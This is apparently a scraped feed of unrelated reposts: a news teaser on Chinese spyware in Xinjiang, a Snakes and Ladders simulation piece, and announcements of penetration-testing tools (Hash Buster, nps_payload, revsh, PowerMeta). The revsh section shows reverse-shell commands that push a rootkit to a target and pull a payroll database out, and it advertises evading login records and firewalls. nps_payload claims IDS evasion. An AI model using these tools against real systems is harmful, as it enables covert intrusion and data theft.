China Is Forcefully Installing Spyware App On The Phones Of Its Muslim Minority

Short Bytes: The Chinese authorities are forcing its Muslim minority population in Xinjiang to install spyware on their smartphones. People are getting notices via WeChat and being instructed to install the app to avert detention up to 10 days. The app regularly scans the media stored on the phone and matches it with a database illegal […]

The post China Is Forcefully Installing Spyware App On The Phones Of Its Muslim Minority appeared first on Fossbytes.

http://ift.tt/2uXVji3 http://ift.tt/2aM8QhC

Anúncios

Simulating Snakes and Ladders for Fun, Not Profit

A great many of you will remember the game of Snakes and Ladders from your youth. It’s a simple game, which one grows to realise involves absolutely no skill – it’s purely the luck of the dice. [Alex Laratro] noticed that without player decisions to effect the outcome, the game was thus a prime candidate for simulation.

[Alex] wanted to dive into the question of “Who is winning a game of Snakes and Ladders?” at any given point in the gameplay. A common approach would be to state “whoever is in front”, but the ladders might have something to say about that. [Alex] uses Markov analysis to investigate, coming to some interesting conclusions about how the game works, and how this compares to the design of more complex games like Mario Kart and Power Grid.

Overall, it’s a breakdown of a popular game that’s simple enough to really sink your teeth into, but has some incredibly interesting conclusions that are well worth considering for anyone designing their own board games. We love seeing math applied to novel and fun problems – and it can solve important problems, too.

Filed under: classic hacks http://ift.tt/2gW9hLa http://ift.tt/2aM8QhC

Hash Buster: scraps online hash crackers to find cleartext of a hash – Penetration Testing

Hash-Buster

Hash Buster is a python script which uses several online hash crackers to find cleartext of a hash in less than 5 seconds.

Features of Hash Buster:

Detects hash

MD5 Support

SHA1 Support

SHA2 Support

Adding more APIs for SHA1 and SHA2

More hash types will be added on demand

Installing and Using Hash Buster

Open your terminal and enter

git clone http://ift.tt/2uo3pyX
cd Hash-Buster
python hash.py

Source: http://ift.tt/2uTejhQ

The post Hash Buster: scraps online hash crackers to find cleartext of a hash appeared first on Penetration Testing.

http://ift.tt/2uodFHJ http://ift.tt/2aM8QhC

nps_payload: generate payloads for basic intrusion detection avoidance – Penetration Testing

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.

Installation

Setting up samba shares:

1.) apt-get install samba

2.) vi/nano/whatever /etc/samba/smb.conf

3.) add the following to the bottom of the file (change as appropriate)

[payloads$] comment = Dirty Payloads path = /opt/shares/payloads browsable = yes guest ok = yes read only = yes

4.) service smbd restart

git clone http://ift.tt/2vzEHKC
cd nps_payload
pip install -r requirements.txt

Source: http://ift.tt/2upzjJT

The post nps_payload: generate payloads for basic intrusion detection avoidance appeared first on Penetration Testing.

http://ift.tt/2uomsco http://ift.tt/2aM8QhC

revsh: A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities – Penetration Testing

revsh

revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting, as well as arbitrary data tunneling.

What is a “reverse shell”?

A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ssh, a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.

What is a “reverse VPN”?

revsh is capable of attaching a virtual ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or ethernet frames. When combined with an Iptables NAT rule, or bridging a real ethernet card, this allows for the operator to receive a fully routable IP address on the target machines network. This, essentially, is a full VPN that has performed a connect-back call to the operator to circumvent in-bound packet filtering and grant the operator full network access.

What is a “bind shell”?

A bind shell is a shell that is served from a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell you can either invoke the -b flag on both ends of the connection, or invoke the binary as ‘bindsh‘.

Can’t I just use netcat?

There are many techniques for establishing a reverse shell, but these methods don’t provide terminal support. revsh allows for a reverse shell whose connection is mediated by a pseudo-terminal, and thus allows for features such as:

job control

control character processing (e.g Ctrl-C)

auto-completion

support for programs requiring a controlling tty (e.g. vi)

processing of window re-size events

In addition, revsh also offers the following features:

UTF-8 support.

Circumvents utmp / wtmp. (No login recorded.)

Processes rc file commands upon login for easy scripting.

OpenSSL encryption with key based authentication baked into the binary.

Anonymous Diffie-Hellman encryption upon request.

Ephemeral Diffie-Hellman encryption as default. (Now with more Perfect Forward Secrecy!)

Cert pinning for protection against sinkholes and mitm counter-intrusion.

Connection timeout for remote process self-termination.

Randomized retry timers for non-predictable auto-reconnection.

Netcat style non-interactive data brokering for file transfer.

Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxys are available in both directions for complete flexibility.

TUN / TAP support for forwarding raw IP packets / Ethernet frames.

Escape sequence commands to kill non-responsive nodes, or print connection statistics.

revsh is intended as a supplementary tool for a pentester’s toolkit that provides the full set of terminal features across an encrypted tunnel. All together in a small (~75k) easy to use binary.

Where can I use revsh?

revsh was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:

x86_64 Linux

i686 Linux

amd64 FreeBSD

Installation

sudo apt-get install openssl libssl-dev # Pre-req for building.
git clone http://ift.tt/2uof4hf
cd revsh
vi config.h # Set up new defaults that fit your situation.
make # This *can* take a very long time, though it usually doesn’t.
make install
cd ~/.revsh
vi rc # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h

Usage

empty@monkey:~$ revsh -h

Control: revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target: revsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

CONTROL_OPTIONS:
-c Run in “command and control” mode. (Default is target mode.)
-a Enable Anonymous Diffie-Hellman mode. (Default is Ephemeral Diffie-Hellman.)
-d KEYS_DIR Reference the keys in an alternate directory. (Default is “~/.revsh/keys/”.)
-f RC_FILE Reference an alternate rc file. (Default is “~/.revsh/rc”.)
-s SHELL Invoke SHELL as the remote shell. (Default is “/bin/bash”.)
-F LOG_FILE Log general use and errors to LOG_FILE. (No default set.)

TARGET_OPTIONS:
-t SEC Set the connection timeout to SEC seconds. (Default is “3600”.)
-r SEC1,SEC2 Set the retry time to be SEC1 seconds, or (Default is “600,1200”.)
to be random in the range from SEC1 to SEC2.

MUTUAL_OPTIONS:
-k Run in keep-alive mode. Node will neither
exit normally, nor seppuku from timeout.
-L [LHOST:]LPORT:RHOST:RPORT
Static socket forwarding with a local
listener at LHOST:LPORT forwarding to
RHOST:RPORT.
-R [RHOST:]RPORT:LHOST:LPORT
Static socket forwarding with a remote
listener at RHOST:RPORT forwarding to
LHOST:LPORT.
-D [LHOST:]LPORT
Dynamic socket forwarding with a local
listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
-B [RHOST:]RPORT
Dynamic socket forwarding with a remote
listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
-x Disable automatic setup of proxies. (Defaults: Proxy D2280 and tun/tap devices.)
-b Start in bind shell mode. (Default is reverse shell mode.)
The -b flag must be invoked on both ends.
-n Non-interactive netcat style data broker. (Default is interactive w/remote tty.)
No tty. Useful for copying files.
-v Verbose. -vv and -vvv increase verbosity.
-h Print this help.
-e Print out some usage examples.

ADDRESS The address of the control listener. (Default is “0.0.0.0”.)
PORT The port of the control listener. (Default is “2200”.)

Examples

Control host example IP: 192.168.0.42
Target host example IP: 192.168.0.66

Interactive example on default port ‘2200’:
control: revsh -c
target: revsh 192.168.0.42

Interactive example on non-standard port ‘443’:
control: revsh -c 192.168.0.42:443
target: revsh 192.168.0.42:443

Bindshell example:
target: revsh -b
control: revsh -c -b 192.168.0.66

Non-interactive file upload example:
control: cat ~/bin/rootkit | revsh -c -n
target: revsh 192.168.0.42 > ./totally_not_a_rootkit

Non-interactive file download example:
control: revsh -c -n >payroll_db.tar
target: cat payroll_db.tar | revsh 192.168.0.42

Non-interactive file download example across existing tunnel:
control: revsh -c -n 127.0.0.1:2291 >payroll_db.tar
target: cat payroll_db.tar | revsh 127.0.0.1:2290

Source: Github

The post revsh: A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities appeared first on Penetration Testing.

http://ift.tt/2uohTz9 http://ift.tt/2aM8QhC

PowerMeta: searches for publicly available files hosted on various websites for a particular domain – Penetration Testing

PowerMeta

PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.

Public File Discovery

For many organizations, it’s common to find publicly available files posted on their external websites. Many times these files contain sensitive information that might be of benefit to an attacker like usernames, domains, software titles or computer names. PowerMeta searches both Bing and Google for files on a particular domain using search strings like “site:targetdomain.com filetype:pdf”. By default, it searches for “pdf, docx, xlsx, doc, xls, pptx, and ppt”.

Metadata Extraction

PowerMeta uses Exiftool by Phil Harvey to extract metadata information from files. If you would prefer to download the binary from his site directly instead of using the one in this repo it can be found here: http://ift.tt/xDUeQA. Just make sure the exiftool executable is in the same directory as PowerMeta.ps1 when it is run. By default, it just extracts the ‘Author’ and ‘Creator’ fields as these commonly have usernames saved. However, all metadata for files can be extracted by passing PowerMeta the -ExtractAllToCsv flag.

Download

Requirements:
PowerShell version 3.0 or later

git clone http://ift.tt/2uolkFU

Usage

Import the Module

C:\> powershell.exe -exec bypass
PS C:\> Import-Module PowerMeta.ps1

PowerMeta Options

TargetDomain – The target domain to search for files.
FileTypes – A comma seperated list of file extensions to search for. By default PowerMeta searches for “pdf, docx, xlsx, doc, xls, pptx, ppt”.
OutputList – A file to output the list of links discovered through web searching to.
OutputDir – A directory to store all downloaded files in.
TargetFileList – List of file links to download.
Download – Instead of being prompted interactively pass this flag to auto-download files found.
Extract – Instead of being prompted interactively pass this flag to extract metadata from found files pass this flag to auto-extract any metadata.
ExtractAllToCsv – All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
UserAgent – Change the default User Agent used by PowerMeta.
MaxSearchPages – The maximum number of pages to search on each search engine.

Basic Search

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx. Once it has finished crafting this list it will prompt the user asking if they wish to download the files from the target domain. After downloading files it will prompt again for extraction of metadata from those files.

PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com

Changing FileTypes and Automatic Download and Extract

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, or xml. It will then automatically download them from the target domain and extract metadata.

xx

Downloading Files From A List

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx and write the links of files found to disk in a file called “target-domain-links.txt”.

xx

Extract All Metadata and Limit Page Search

This command will initiate Google and Bing searches for files on the ‘targetdomain.com’ domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx but only search the first two pages. All metadata (not just the default fields) will be saved in a CSV called all-target-metadata.csv.

xx

Extract Metadata From Files In A Directory

This command will simply extract all the metadata from all the files in the folder “\2017-03-031-144953” and save it in a CSV called all-target-metadata.csv

xx

Source: Github

The post PowerMeta: searches for publicly available files hosted on various websites for a particular domain appeared first on Penetration Testing.

http://ift.tt/2uo89Vn http://ift.tt/2aM8QhC